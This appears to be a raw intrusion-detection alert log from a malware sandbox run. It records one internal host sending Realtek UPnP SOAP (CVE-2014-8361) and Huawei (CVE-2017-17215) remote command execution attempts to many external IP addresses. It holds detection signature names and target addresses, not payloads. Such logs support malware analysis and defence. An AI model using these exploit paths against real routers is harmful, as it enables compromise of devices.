                                                07/20/24-23:06:18.935568TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613983652869192.168.2.1437.41.70.141
                                                07/20/24-23:06:02.997058TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615766852869192.168.2.1470.37.111.197
                                                07/20/24-23:06:19.059438TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4533452869192.168.2.14122.109.165.81
                                                07/20/24-23:06:02.940936TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613965852869192.168.2.1435.213.181.62
                                                07/20/24-23:05:38.953817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296837215192.168.2.1441.49.10.35
                                                07/20/24-23:05:39.678174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453437215192.168.2.14197.0.66.168
                                                07/20/24-23:05:52.535101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3327652869192.168.2.1479.31.170.172
                                                07/20/24-23:05:52.557712TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3435252869192.168.2.14181.238.128.43
                                                07/20/24-23:05:57.002874TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5550852869192.168.2.14113.250.68.242
                                                07/20/24-23:05:35.949656TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4711252869192.168.2.14168.99.192.8
                                                07/20/24-23:05:52.527430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5986252869192.168.2.1457.134.107.229
                                                07/20/24-23:06:14.442724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4808052869192.168.2.14207.87.0.239
                                                07/20/24-23:05:33.857328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939637215192.168.2.1441.248.125.74
                                                07/20/24-23:06:09.682183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5350652869192.168.2.14175.89.209.205
                                                07/20/24-23:06:53.637724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25457252869192.168.2.1454.49.52.11
                                                07/20/24-23:05:38.944157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695037215192.168.2.1454.135.213.18
                                                07/20/24-23:06:35.070304TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4389652869192.168.2.14187.88.165.50
                                                07/20/24-23:06:21.746493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613774852869192.168.2.14221.179.69.203
                                                07/20/24-23:06:39.471724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4054052869192.168.2.14121.13.235.76
                                                07/20/24-23:05:42.136712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800837215192.168.2.1441.75.49.25
                                                07/20/24-23:05:42.257816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5476437215192.168.2.14197.98.241.162
                                                07/20/24-23:05:57.194696TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614095852869192.168.2.1462.67.165.78
                                                07/20/24-23:06:01.940214TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615189852869192.168.2.1468.40.46.225
                                                07/20/24-23:05:50.479091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144037215192.168.2.14157.93.141.29
                                                07/20/24-23:05:33.835674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829637215192.168.2.14157.170.165.170
                                                07/20/24-23:05:52.515826TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25262852869192.168.2.14198.39.44.17
                                                07/20/24-23:05:47.054544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900437215192.168.2.1464.3.195.4
                                                07/20/24-23:07:03.190387TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24027852869192.168.2.1489.185.47.122
                                                07/20/24-23:06:12.663367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4190452869192.168.2.1481.179.50.162
                                                07/20/24-23:05:52.460913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4923452869192.168.2.1482.30.99.23
                                                07/20/24-23:05:58.334968TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25236452869192.168.2.14159.109.243.206
                                                07/20/24-23:05:59.267873TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614959252869192.168.2.14164.94.110.129
                                                07/20/24-23:07:07.879176TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25320252869192.168.2.1413.115.234.149
                                                07/20/24-23:06:03.345104TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615091652869192.168.2.1452.30.74.250
                                                07/20/24-23:06:11.469684TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928052869192.168.2.1413.13.248.159
                                                07/20/24-23:06:08.489738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616088652869192.168.2.144.87.173.24
                                                07/20/24-23:05:37.593936TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24476452869192.168.2.14223.210.25.241
                                                07/20/24-23:06:54.482380TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614445452869192.168.2.14141.141.50.24
                                                07/20/24-23:05:59.080968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613571652869192.168.2.14148.192.90.183
                                                07/20/24-23:05:57.958012TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615633652869192.168.2.14128.239.71.215
                                                07/20/24-23:05:40.468265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5587652869192.168.2.1492.247.141.149
                                                07/20/24-23:05:38.951134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026037215192.168.2.1489.107.222.198
                                                07/20/24-23:05:37.496382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3518852869192.168.2.14170.98.124.78
                                                07/20/24-23:06:01.515617TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3771652869192.168.2.14203.188.134.128
                                                07/20/24-23:05:42.136712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4632237215192.168.2.14157.196.112.31
                                                07/20/24-23:05:57.173548TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5437252869192.168.2.1419.148.221.102
                                                07/20/24-23:05:33.859349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267637215192.168.2.1441.156.206.214
                                                07/20/24-23:05:57.809291TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615212252869192.168.2.14159.109.243.206
                                                07/20/24-23:06:51.995876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5457052869192.168.2.14181.187.190.81
                                                07/20/24-23:06:46.927906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951037215192.168.2.1441.32.106.205
                                                07/20/24-23:05:35.248418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5367652869192.168.2.14121.248.9.74
                                                07/20/24-23:05:39.397958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3429852869192.168.2.14126.55.207.112
                                                07/20/24-23:05:39.060021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430637215192.168.2.1441.220.87.27
                                                07/20/24-23:06:44.280800TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614129452869192.168.2.14190.112.31.150
                                                07/20/24-23:05:35.874981TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613619252869192.168.2.1465.108.13.201
                                                07/20/24-23:05:48.805828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875637215192.168.2.1441.114.68.226
                                                07/20/24-23:06:00.191114TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613909852869192.168.2.14139.145.62.207
                                                07/20/24-23:06:54.322182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615398452869192.168.2.14122.215.163.185
                                                07/20/24-23:05:37.440307TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24481052869192.168.2.14174.38.108.83
                                                07/20/24-23:05:36.339999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440837215192.168.2.14197.105.100.5
                                                07/20/24-23:06:06.466712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383637215192.168.2.14155.221.60.182
                                                07/20/24-23:05:37.440434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4666252869192.168.2.14157.104.97.161
                                                07/20/24-23:05:42.221844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168837215192.168.2.14101.226.44.90
                                                07/20/24-23:06:53.169467TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3450652869192.168.2.1412.222.33.202
                                                07/20/24-23:05:39.680161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5815237215192.168.2.14177.75.203.96
                                                07/20/24-23:05:56.124566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3365437215192.168.2.1441.58.153.232
                                                07/20/24-23:05:35.307399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614704652869192.168.2.14192.216.183.201
                                                07/20/24-23:05:35.729283TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615259652869192.168.2.14179.192.77.243
                                                07/20/24-23:05:39.578201TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614865052869192.168.2.14165.39.41.234
                                                07/20/24-23:05:45.106264TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613557452869192.168.2.14167.216.237.21
                                                07/20/24-23:05:47.129772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138837215192.168.2.14157.121.114.20
                                                07/20/24-23:05:52.546679TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24950452869192.168.2.14131.30.152.0
                                                07/20/24-23:05:40.421092TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23710452869192.168.2.14191.156.105.201
                                                07/20/24-23:06:01.256977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5770452869192.168.2.14130.0.101.52
                                                07/20/24-23:05:59.080968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3928852869192.168.2.1459.30.40.102
                                                07/20/24-23:06:06.631877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016837215192.168.2.14197.158.115.164
                                                07/20/24-23:06:15.061851TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3576452869192.168.2.1412.193.71.48
                                                07/20/24-23:05:47.125782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078837215192.168.2.1441.57.242.76
                                                07/20/24-23:05:48.775023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360237215192.168.2.1441.140.47.212
                                                07/20/24-23:05:59.042861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5517452869192.168.2.14146.28.213.74
                                                07/20/24-23:06:14.305121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3898252869192.168.2.1496.157.22.210
                                                07/20/24-23:05:34.654274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251837215192.168.2.14197.49.145.149
                                                07/20/24-23:05:34.662338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373237215192.168.2.14197.152.47.25
                                                07/20/24-23:05:36.526908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816037215192.168.2.14149.146.147.141
                                                07/20/24-23:05:48.763322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6075837215192.168.2.14197.95.27.27
                                                07/20/24-23:05:57.013302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5617052869192.168.2.14163.139.96.29
                                                07/20/24-23:05:57.037609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5864452869192.168.2.14107.22.142.143
                                                07/20/24-23:06:10.376181TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25386652869192.168.2.14175.89.209.205
                                                07/20/24-23:06:12.826285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5473252869192.168.2.1478.50.122.206
                                                07/20/24-23:06:10.473848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3378652869192.168.2.14160.153.18.205
                                                07/20/24-23:05:38.953817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280037215192.168.2.1441.66.114.65
                                                07/20/24-23:05:57.141104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6057252869192.168.2.14130.169.76.188
                                                07/20/24-23:07:10.361471TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613795252869192.168.2.1449.169.205.181
                                                07/20/24-23:06:26.096786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615757652869192.168.2.14115.192.236.13
                                                07/20/24-23:05:40.359038TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25528052869192.168.2.1436.253.231.32
                                                07/20/24-23:05:34.657123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255037215192.168.2.1441.206.29.121
                                                07/20/24-23:05:37.449834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5808252869192.168.2.14148.195.201.170
                                                07/20/24-23:06:17.539924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744837215192.168.2.14157.94.71.127
                                                07/20/24-23:07:05.182532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5246452869192.168.2.14118.250.58.5
                                                07/20/24-23:05:40.365777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24043052869192.168.2.1491.115.151.211
                                                07/20/24-23:05:42.180899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919037215192.168.2.14190.85.212.40
                                                07/20/24-23:06:51.240850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4064452869192.168.2.14118.110.83.106
                                                07/20/24-23:07:06.909872TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615122452869192.168.2.14212.62.223.235
                                                07/20/24-23:05:39.067591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3443237215192.168.2.14157.219.251.88
                                                07/20/24-23:05:57.109755TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24559052869192.168.2.14140.147.162.187
                                                07/20/24-23:05:57.116146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3491652869192.168.2.14182.142.59.96
                                                07/20/24-23:05:40.392392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24876452869192.168.2.1417.18.17.141
                                                07/20/24-23:05:52.554950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5931052869192.168.2.1434.93.140.173
                                                07/20/24-23:05:52.502632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5114652869192.168.2.1461.16.44.183
                                                07/20/24-23:05:56.069521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381037215192.168.2.1495.29.118.162
                                                07/20/24-23:06:18.662067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886837215192.168.2.14197.171.188.166
                                                07/20/24-23:06:09.742007TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615652452869192.168.2.14124.231.89.13
                                                07/20/24-23:06:07.259152TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4043052869192.168.2.14122.149.24.168
                                                07/20/24-23:06:02.417792TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24417252869192.168.2.1441.130.186.1
                                                07/20/24-23:05:40.467316TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5315852869192.168.2.1478.197.124.123
                                                07/20/24-23:05:44.246846TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23634452869192.168.2.14204.197.104.210
                                                07/20/24-23:06:09.698680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4689852869192.168.2.14103.38.73.32
                                                07/20/24-23:06:14.441698TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5028452869192.168.2.14159.87.117.156
                                                07/20/24-23:05:40.347577TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25725052869192.168.2.1459.45.134.101
                                                07/20/24-23:05:39.685214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866637215192.168.2.14157.44.139.24
                                                07/20/24-23:05:56.058256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4454837215192.168.2.14126.25.72.120
                                                07/20/24-23:06:34.260416TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616072252869192.168.2.14139.133.137.186
                                                07/20/24-23:06:20.610603TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3630452869192.168.2.14120.51.213.234
                                                07/20/24-23:06:19.865859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5344252869192.168.2.14112.35.155.8
                                                07/20/24-23:07:25.723282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614453852869192.168.2.14170.22.45.167
                                                07/20/24-23:05:35.846905TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4054652869192.168.2.14163.170.37.61
                                                07/20/24-23:06:01.842190TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5566652869192.168.2.14169.21.93.225
                                                07/20/24-23:06:03.045663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4569852869192.168.2.1459.99.219.79
                                                07/20/24-23:05:59.133147TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614090052869192.168.2.1473.142.223.114
                                                07/20/24-23:06:02.920702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24075252869192.168.2.14193.28.16.55
                                                07/20/24-23:05:57.544145TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4399852869192.168.2.14173.94.91.109
                                                07/20/24-23:06:13.609530TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5084852869192.168.2.14178.8.150.76
                                                07/20/24-23:05:45.147931TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615469052869192.168.2.14207.195.83.121
                                                07/20/24-23:06:23.081522TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613647852869192.168.2.142.111.252.152
                                                07/20/24-23:05:58.821284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23514052869192.168.2.14209.194.5.31
                                                07/20/24-23:06:13.676864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3383452869192.168.2.1459.78.96.71
                                                07/20/24-23:05:42.145992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766837215192.168.2.14157.187.94.186
                                                07/20/24-23:05:35.601714TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5101852869192.168.2.14132.253.188.42
                                                07/20/24-23:05:52.528818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3710852869192.168.2.14210.13.132.2
                                                07/20/24-23:05:35.300719TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613574852869192.168.2.14200.98.155.108
                                                07/20/24-23:05:59.449873TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25633852869192.168.2.1444.160.30.244
                                                07/20/24-23:06:01.160884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613446852869192.168.2.1437.78.193.168
                                                07/20/24-23:06:23.270832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4747852869192.168.2.14162.101.84.116
                                                07/20/24-23:06:08.610993TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25005852869192.168.2.1440.174.255.112
                                                07/20/24-23:05:58.178719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4099052869192.168.2.14108.204.101.233
                                                07/20/24-23:05:40.331311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24423252869192.168.2.1459.44.23.42
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626037215192.168.2.14222.153.36.208
                                                07/20/24-23:05:36.577316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3677237215192.168.2.14187.64.166.86
                                                07/20/24-23:06:09.682183TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615884852869192.168.2.144.189.206.195
                                                07/20/24-23:06:01.860812TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615169652869192.168.2.14150.158.253.160
                                                07/20/24-23:06:16.190479TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615399252869192.168.2.1446.33.233.116
                                                07/20/24-23:05:52.504672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5920252869192.168.2.14144.116.128.187
                                                07/20/24-23:05:40.461168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24990852869192.168.2.14200.65.225.77
                                                07/20/24-23:06:01.625834TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613634452869192.168.2.1477.92.149.55
                                                07/20/24-23:05:52.513067TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5002252869192.168.2.14183.184.211.239
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437437215192.168.2.1441.196.91.80
                                                07/20/24-23:05:35.501401TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615596652869192.168.2.1460.73.199.117
                                                07/20/24-23:06:01.862638TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4716852869192.168.2.1414.220.33.65
                                                07/20/24-23:06:01.982338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5200852869192.168.2.1468.40.46.225
                                                07/20/24-23:06:06.402809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5788052869192.168.2.14147.116.212.99
                                                07/20/24-23:06:15.234952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615443052869192.168.2.14216.94.128.112
                                                07/20/24-23:05:40.369944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23981052869192.168.2.1454.215.17.180
                                                07/20/24-23:05:34.627949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071637215192.168.2.148.206.119.75
                                                07/20/24-23:05:58.898489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5789052869192.168.2.14119.8.55.247
                                                07/20/24-23:05:56.066947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742437215192.168.2.1466.202.79.145
                                                07/20/24-23:05:36.574960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859437215192.168.2.1441.114.157.137
                                                07/20/24-23:05:36.324297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615837215192.168.2.14157.223.162.148
                                                07/20/24-23:05:59.045965TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4375452869192.168.2.14187.252.112.173
                                                07/20/24-23:06:12.531607TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613915452869192.168.2.14170.202.83.13
                                                07/20/24-23:05:34.622609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084237215192.168.2.14190.164.230.172
                                                07/20/24-23:05:47.101729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877837215192.168.2.14157.198.56.147
                                                07/20/24-23:06:57.758895TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615712452869192.168.2.14147.111.251.208
                                                07/20/24-23:05:36.076308TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615433852869192.168.2.1441.152.208.190
                                                07/20/24-23:05:58.415863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4129852869192.168.2.14107.64.165.241
                                                07/20/24-23:05:57.830942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614759052869192.168.2.14152.47.45.245
                                                07/20/24-23:05:33.859349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4873837215192.168.2.14197.38.240.133
                                                07/20/24-23:05:52.503773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24531452869192.168.2.1493.192.213.30
